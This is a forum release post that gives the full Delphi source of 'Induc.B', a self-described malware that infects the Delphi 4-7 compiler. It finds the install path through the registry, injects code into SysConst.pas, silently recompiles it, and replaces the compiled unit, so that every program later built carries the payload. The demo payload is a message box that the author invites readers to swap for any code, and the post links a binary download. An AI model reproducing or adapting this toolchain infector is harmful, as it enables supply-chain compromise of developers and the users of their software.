[REL]Delphi File-Infector [Induc.B]

[Bozok]

The most Delphi Coders should know Induc.A, its one of the first Malwares who can modify the compiler in a way that the Compiler itself reproduces the Malware again.

I just analyzed Induc.A and realized how it works, so I wrote a second Version of it, which does not respread itself again.

This version just shows an MessageBox with "Infected by Induc.B" in EVERY App you compile with Delphi 4-7, but you can easily customize it.

Source:

Code:

{
Coder: Slayer616,Induc-Coder
Version: Induc.B
History: 19.05.2010 - First Try

This is a first, non-selfspreading Version of Induc!
Like you should see on "InfectionMessage" i just use a simple MessageBox
for the Infection, but you are able to customize that just by editing the
constant with your Delphi Code!
}
program prjIndux;
uses
  windows,classes;

const
InfectionMessage:string = 'uses windows;' + #13#10 + 'begin' + #13#10 + 'MessageBoxA(0,pchar(''Infected by Induc.B''),pchar(''By Slayer616''),0);' + #13#10 + 'end.';

//Taken from Delphi Praxis
function FileToString(const FileName: string): AnsiString;
var
  fs: TFileStream;
  Len: Integer;
begin
  fs := TFileStream.Create(FileName, $0000 or $0020);
  try
    Len := fs.Size;
    SetLength(Result, Len);
    if Len > 0 then
      fs.ReadBuffer(Result[1], Len);
  finally
    fs.Free;
  end;
end;
Procedure StringToFile(const FileName, Str: string);
var
  fs: TFileStream;
  Len: Integer;
begin
  fs := TFileStream.Create(FileName, fmcreate);
  try
    Len := Length(Str);
    fs.Write(Str[1], Len);
  finally
    fs.Free;
  end;
end;

Function WriteInfection(sPath:string):boolean;
var
  sPos:Integer;
  sTempStr:string;
begin
result := false;
sTempStr :=FileToString(sPath + '\lib\sysconst.pas');
if sTempStr = '' then exit;
sPos := pos('implementation',sTempStr);
if sPos = 0 then exit;
sPos := sPos + 15;
sTempStr := copy(sTempstr,1,sPos);
sTempstr := sTempstr + InfectionMessage;
StringToFile(sPath + '\lib\sysconst.pas',sTempStr);
result := true;
end;

Function CompileInfectedSysconst(sPath:string):boolean;
var
  SI:TStartupInfo;
  PI:TProcessInformation;
begin
fillchar(SI,sizeof(SI),0);
SI.cb:=sizeof(SI);
SI.dwFlags:=STARTF_USESHOWWINDOW;
SI.wShowWindow:=SW_HIDE;
result := CreateProcess(nil,pchar(sPath + '\bin\dcc32.exe' +' '+ sPath +'\lib\sysconst.pas'),nil,nil,false,NORMAL_PRIORITY_CLASS,nil,nil,SI,PI);
if result then WaitForSingleObject(PI.hProcess,INFINITE)
end;

Function InfectSysconst(sPath:string):boolean;
begin
  Result := true;
  If CopyFile(Pchar(sPath + '\source\rtl\sys\SysConst.pas'), Pchar(sPath + '\lib\sysconst.pas'),false) = false then begin
    Result := false;
    Exit;
  end;
  If WriteInfection(sPath) = false then begin
    Result := false;
    Exit;
  end;
  If CompileInfectedSysconst(sPath) = false then begin
    Result := false;
    Exit;
  end;
  If DeleteFile(pchar(sPath + '\lib\sysconst.pas')) = false then begin
    Result := false;
    Exit;
  end;
end;

Function BackUp(sPath:string):Boolean;
begin
Result := MoveFile(pchar(sPath+'\lib\sysconst.dcu'),pchar(sPath+'\lib\sysconst.bak'));
end;

var
 cVersion:char;
 c:array [1..255] of char;
 i:integer;
 sTemp,sSysconst:string;
 k:HKEY;
begin
MessageBoxA(0,Pchar('Welcome to Induc.B' + #13#10 + 'Welcome to the Sysconst Infector!' + #13#10 + 'I will now try to find the Compiler and the Sysconst.pas...'),'',0);
for cVersion := '4' to '7' do begin
 if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+ cVersion + '.0'),0,KEY_READ,k)=0 then begin
  i:=255;
  if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then begin
   sTemp := '';
   i:=1;
   //Copy Array of Char into String
   while c[i]<>#0 do begin
    sTemp := sTemp + c[i];
    inc(i);
   end;
   sSysconst := sTemp ;
   MessageBoxA(0,Pchar('Delphi Version found: ' + cVersion + '.0' + #13#10 + 'Compilerpath: ' + sTemp + '\bin\dcc32.exe' + #13#10 + 'Sysconst.pas: ' + sSysconst + '\source\rtl\sys\SysConst.pas' + #13#10 + #13#10 + 'Now starting Backup of original Sysconst.dcu...'),pchar('WIN!'),0);
   If Backup(sSysconst) = false then begin
    MessageBoxA(0,Pchar('Failed to backup Sysconst!' + #13#10 + 'Cancelling Process...'),Pchar('Error!'),0);
    Exit;
   end;
   MessageBoxA(0,Pchar('Backup completed!' + #13#10 + 'Backupfile: ' + sSysconst +'\lib\sysconst.bak' + #13#10 + #13#10 + 'Now infecting Sysconst...'),'',0);
   If InfectSysconst(sSysconst) then begin
    MessageBoxA(0,pchar('You are now infected by Induc.B' + #13#10 + 'For Desinfection just replace Sysconst.Bak with Sysconst.dcu in: ' +  sSysconst +'\lib\sysconst.bak'),'',0);
   end else begin
    MessageBoxA(0,pchar('Cant infect Sysconst! Cancelling Process...'),'',0);
    exit;
   end;
  end;
  RegCloseKey(k);
 end;
end;
end.

Virusscan of Original File
Virusscan of infected File


Download: Download: Induc.B.rar | xup.in